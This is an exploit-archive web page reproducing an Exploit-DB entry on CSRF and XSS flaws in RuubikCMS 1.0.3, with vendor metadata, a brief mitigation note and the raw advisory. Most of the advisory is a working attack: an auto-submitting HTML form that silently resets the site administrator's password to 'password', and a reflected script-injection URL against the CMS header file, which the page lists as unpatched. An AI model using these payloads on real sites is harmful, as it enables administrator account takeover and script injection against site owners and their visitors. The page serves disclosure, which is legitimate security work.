Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
RuubikCMS Version 1.0.3 - exploit.company
header-logo
Suggest Exploit
vendor:
RuubikCMS
by:
Khashayar Fereidani
5.5
CVSS
MEDIUM
CSRF (Change Admin Password) and XSS
CWE
Product Name: RuubikCMS
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

RuubikCMS Version 1.0.3

CSRF exploit allows an attacker to change the admin password without authorization. XSS vulnerability allows an attacker to execute arbitrary script code on the affected website.

Mitigation:

To mitigate CSRF, implement measures such as using CSRF tokens and checking the referrer header. To mitigate XSS, ensure input validation and output encoding are implemented.
Source

Exploit-DB raw data:

----------------------------------------------------------------
WebApplication : RuubikCMS Version 1.0.3
Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.ruubikcms.com/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://examplesite/ruubikcms/cms/users.php?role=5&p=admin";

method="POST" name="form">

<input type="hidden" name="save" value="1">

<input type="hidden" name="ordernum" value="1">

<input type="hidden" name="username_hidden" value="admin">

<input type="hidden" name="password" value="password">

<input type="hidden" name="confirmpassword" value="password">



</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerability :

http://examplesite/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>

Navigation

Suggest Exploit

Services By CQR